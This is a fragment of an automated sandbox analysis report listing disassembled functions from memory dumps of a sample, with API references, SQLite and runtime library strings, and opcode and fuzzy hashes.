                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • 00007FFE148D2010.VCRUNTIME140(?,?,?,?,00000080,?,?,?,00000000,00007FFDFAF68BBF), ref: 00007FFDFAF68889
                                                                                                                                                                                                                                • 00007FFE148D2010.VCRUNTIME140(?,?,?,?,00000080,?,?,?,00000000,00007FFDFAF68BBF), ref: 00007FFDFAF6890B
                                                                                                                                                                                                                                • 00007FFE148D2010.VCRUNTIME140(?,?,?,?,00000080,?,?,?,00000000,00007FFDFAF68BBF), ref: 00007FFDFAF689FD
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFAED0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196705748.00007FFDFAED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB032000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB034000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB049000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2197064707.00007FFDFB04B000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2197118312.00007FFDFB04C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdfaed0000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: 00007D2010E148
                                                                                                                                                                                                                                • String ID: RETURNING may not use "TABLE.*" wildcards
                                                                                                                                                                                                                                • API String ID: 1405196051-2313493979
                                                                                                                                                                                                                                • Opcode ID: 146eb460578fec6d1865fa0f9d6aa01ca58768e43229fe6905c3daccb3e00cc8
                                                                                                                                                                                                                                • Instruction ID: 8cb2183f5bfc91493e7aa83f607f784ef114fcbff11894659d3bb7ef3571567f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 146eb460578fec6d1865fa0f9d6aa01ca58768e43229fe6905c3daccb3e00cc8
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4AB1AE22B18B8185E724CB25D5606A967A1FB55BE4F098339EEBD0B7D9DF38E091C340
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • 00007FFE148D2010.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00007FFDFAF17857), ref: 00007FFDFAF1D59A
                                                                                                                                                                                                                                • 00007FFE148D2010.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00007FFDFAF17857), ref: 00007FFDFAF1D5C4
                                                                                                                                                                                                                                • 00007FFE148D2010.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00007FFDFAF17857), ref: 00007FFDFAF1D617
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFAED0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196705748.00007FFDFAED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB032000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB034000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB049000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2197064707.00007FFDFB04B000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2197118312.00007FFDFB04C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdfaed0000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: 00007D2010E148
                                                                                                                                                                                                                                • String ID: H
                                                                                                                                                                                                                                • API String ID: 1405196051-2852464175
                                                                                                                                                                                                                                • Opcode ID: 514d7303eeb31d981147c69c7a56ef58d2f0ef438fa373e1b1835ae557823639
                                                                                                                                                                                                                                • Instruction ID: 49db1a35a975a2b5379763e25fd86c2c98407363e96df478ce4f140f23fca2f1
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 514d7303eeb31d981147c69c7a56ef58d2f0ef438fa373e1b1835ae557823639
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FA91AF6671964196EB388E169060B7967B0FF84BE8F544774EEAD4B7D8CF3CE4508B00
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                                                                • API String ID: 3215553584-1196891531
                                                                                                                                                                                                                                • Opcode ID: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
                                                                                                                                                                                                                                • Instruction ID: 89d22a8eaef4cfcf86cb4a76e77747351a330e24ebd7da863516a121a4618b7c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DC818972E0C2538DE775BE29818227936A1AF11B88F558035DF09DB28FDF2DE9029301
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFAED0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196705748.00007FFDFAED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB032000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB034000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB049000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2197064707.00007FFDFB04B000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2197118312.00007FFDFB04C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdfaed0000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: %s.%s$column%d$rowid
                                                                                                                                                                                                                                • API String ID: 0-1505470444
                                                                                                                                                                                                                                • Opcode ID: a3ad4fa662da839f3409e5dc7edcc0671dfe5c2e36a581b2c6be11a329ffccef
                                                                                                                                                                                                                                • Instruction ID: abab5f9e9fdfcd7d56a35f5777bb6a207762b503dbe84de99c4dea4ffd63e98b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a3ad4fa662da839f3409e5dc7edcc0671dfe5c2e36a581b2c6be11a329ffccef
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1591BF26B08B8185EB289B15E4A47A967A4FF45BF4F494376EA7D0B7D8DF39D401C300
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFAED0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196705748.00007FFDFAED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB032000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB034000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB049000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2197064707.00007FFDFB04B000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2197118312.00007FFDFB04C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdfaed0000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
                                                                                                                                                                                                                                • API String ID: 0-3727861699
                                                                                                                                                                                                                                • Opcode ID: e2d0cf860632e4025fa59867ecab262051eec4f2c7b174613d4d04a489a38db7
                                                                                                                                                                                                                                • Instruction ID: ee76ed82c43e56c19b62f7f8ca6a81738a78ba875f312ea27d70703b579cf08b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e2d0cf860632e4025fa59867ecab262051eec4f2c7b174613d4d04a489a38db7
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F78136227086D28AD7689B25D4A0A7E7BA0FB41B84F084172DFAE476D9DF3DF455D300
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFAED0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196705748.00007FFDFAED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB032000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB034000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB049000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2197064707.00007FFDFB04B000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2197118312.00007FFDFB04C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdfaed0000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: 00007D2010E148
                                                                                                                                                                                                                                • String ID: $, $CREATE TABLE
                                                                                                                                                                                                                                • API String ID: 1405196051-3459038510
                                                                                                                                                                                                                                • Opcode ID: d5681bcdf7bfa2ca83ec83ff2302f8f1caba803ac1806718b92abe7f3bb8db5d
                                                                                                                                                                                                                                • Instruction ID: 22982117e7f26b37b7c2a5564ca6a809eb7b6bd61e9da9d323bac671c501fa38
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d5681bcdf7bfa2ca83ec83ff2302f8f1caba803ac1806718b92abe7f3bb8db5d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E6611762B0868246DB198F28E4506B9B7A2FF41BA5F484375EA6D473E9DF3DD486C300
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2194820535.00007FFDF8551000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFDF8550000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194771737.00007FFDF8550000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194820535.00007FFDF85B2000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194820535.00007FFDF85FE000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194820535.00007FFDF8602000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194820535.00007FFDF8607000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194820535.00007FFDF865F000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194820535.00007FFDF8664000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194820535.00007FFDF8667000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2195351397.00007FFDF8668000.00000080.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2195399422.00007FFDF8669000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdf8550000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: 00007B6570
                                                                                                                                                                                                                                • String ID: CJK UNIFIED IDEOGRAPH-$HANGUL SYLLABLE
                                                                                                                                                                                                                                • API String ID: 4069847057-87138338
                                                                                                                                                                                                                                • Opcode ID: 8c364d9f7697f15a55bc755bfe662b8d9c35c3fd34f27cade82d87210dead623
                                                                                                                                                                                                                                • Instruction ID: 7a70fafc8467b485fb3828a6d262b08f610a2468142135da882d02ba4a7dd365
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8c364d9f7697f15a55bc755bfe662b8d9c35c3fd34f27cade82d87210dead623
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 75612A72B1824187E7618A15AC20ABA7652FB84BD8F448235EA7D4BBDCDF3CE401D705
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                                                • String ID: csm
                                                                                                                                                                                                                                • API String ID: 2395640692-1018135373
                                                                                                                                                                                                                                • Opcode ID: 4bd751ab4a757734da5bac4c310991cbc8ef63d187f18c7a3c34a87046479a0f
                                                                                                                                                                                                                                • Instruction ID: 9ac13814da8063900a28e86598f13c1da37cfc9eee31346957f08f3bb5c07527
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4bd751ab4a757734da5bac4c310991cbc8ef63d187f18c7a3c34a87046479a0f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 04518C26B1D6028EDB14BB15E8A5A7873E1EB44B98F148136DE4E8778CEF7CE841C700
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFAED0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196705748.00007FFDFAED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB032000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB034000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB049000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2197064707.00007FFDFB04B000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2197118312.00007FFDFB04C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdfaed0000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: 00007D2010E148
                                                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
                                                                                                                                                                                                                                • API String ID: 1405196051-3727861699
                                                                                                                                                                                                                                • Opcode ID: 4e5ba4681e2093be176ca7c8c82f6c6e17af8170c834e63d6ffcf95579cc9b97
                                                                                                                                                                                                                                • Instruction ID: 3fc9e104cfeea0c4d3102fe71d07f578090b92516b748693008ece5383e4ae02
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4e5ba4681e2093be176ca7c8c82f6c6e17af8170c834e63d6ffcf95579cc9b97
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8E510F72709BC085CB14DB05E4A8AAEBBA4FB59784F55813AEA9E43798DF3DE045C700
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFAED0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196705748.00007FFDFAED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB032000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB034000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB049000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2197064707.00007FFDFB04B000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2197118312.00007FFDFB04C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdfaed0000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: 00007D2010E148
                                                                                                                                                                                                                                • String ID: out of memory$string or blob too big
                                                                                                                                                                                                                                • API String ID: 1405196051-2410398255
                                                                                                                                                                                                                                • Opcode ID: 2546402ceff79975b6071e291ca9160533ac407746b903c1a5e86b998dc6c08d
                                                                                                                                                                                                                                • Instruction ID: 0c3d622ccd1bb5aae2c24c449aa9f43fb008882fd621850ccfe2c31485c1e23f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2546402ceff79975b6071e291ca9160533ac407746b903c1a5e86b998dc6c08d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A661D362B0866282E7189B26D160A7D6760FF45BE4F188176FE6D4BBDDCF3CE4428710
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                                • String ID: MOC$RCC
                                                                                                                                                                                                                                • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                                • Opcode ID: 1c81a5d02d7979dd4dad50f55436adaf5051385037e661534b2c2f58034018d3
                                                                                                                                                                                                                                • Instruction ID: bf69efbd19a559e2910b02a1546d6312629e44a9c7fc2dbbe2e400cd7e00b4a3
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1c81a5d02d7979dd4dad50f55436adaf5051385037e661534b2c2f58034018d3
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 71617532A0CBC589E761BB15E8913A9B7A0FB95794F044225EF9C47B5ADF7CD190CB00
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                                • String ID: csm$csm
                                                                                                                                                                                                                                • API String ID: 3896166516-3733052814
                                                                                                                                                                                                                                • Opcode ID: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
                                                                                                                                                                                                                                • Instruction ID: 78056e1bd39a6ad11124c5a0210f35a5339a81971ac2f6d7ea45a5918c4d0b4e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 51517D32B0C6428EEB64BB2698E626877A4FB55B84F144136DF5D87B9ACF3CE450C701
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFAED0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196705748.00007FFDFAED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB032000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB034000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB049000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2197064707.00007FFDFB04B000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2197118312.00007FFDFB04C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdfaed0000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: 00007D2010E148
                                                                                                                                                                                                                                • String ID: (join-%u)$(subquery-%u)
                                                                                                                                                                                                                                • API String ID: 1405196051-2916047017
                                                                                                                                                                                                                                • Opcode ID: dd03e86373ea881490972c419df84515b5e456637643e20537e58924f789cd37
                                                                                                                                                                                                                                • Instruction ID: 48326440ffbff9133e0b0dd05fb6fef4919412afa9ccf2f35acc59aa72197a66
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dd03e86373ea881490972c419df84515b5e456637643e20537e58924f789cd37
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2651AE62B1864285EB69AA25D0A4F3D27A1FB14BA4F5546B1C97E473C8DF2EF8418700
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFAED0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196705748.00007FFDFAED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB032000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB034000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB049000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2197064707.00007FFDFB04B000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2197118312.00007FFDFB04C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdfaed0000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: 00007D2010E148
                                                                                                                                                                                                                                • String ID: $%!.15g$-
                                                                                                                                                                                                                                • API String ID: 1405196051-875264902
                                                                                                                                                                                                                                • Opcode ID: ffdc6392e0312284d0d157c5cf372c93c08476705884f8b4537a0fac0e79bd20
                                                                                                                                                                                                                                • Instruction ID: c47cd27cab8e4de156ca8efcd17df9bcbdaad2620deca80e86c28f94bcf1ad15
